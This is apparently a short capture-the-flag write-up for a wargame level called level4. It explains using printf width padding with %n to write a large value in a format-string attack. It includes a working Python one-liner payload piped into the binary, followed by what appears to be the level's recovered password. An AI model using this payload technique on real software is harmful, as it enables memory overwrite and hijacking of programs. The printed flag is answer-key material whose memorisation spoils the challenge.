# SAME AS BEFORE BUT  %[12]n
# AND CAUSE THE INT IS TO MUCH CHAR THAN WHAT WE CAN PUT IN THE FGETS WHO HAS A BUFFER OF 512 BUT CAN'T DO AS BEFORE
# SO THERE IS ANOTHER TECH TO USE printf(%d)
# %d, %i The precision, if any, gives the minimum number of digits that must appear ---> fill with 0 the [number] between % and d or i -> %[number]d
Ex : 
> printf("%05d", 1);
00001

# So we the adress we need to fill and go BRRRRR

python -c 'print "\x10\x98\x04\x08"  + "%16930112d%12$n"' |  ./level4

0f99ba5e9c446258a69b290407a6c60859e9c2d25b26575cafc9ae6d75e9456a # We don't even need to let the stdin open
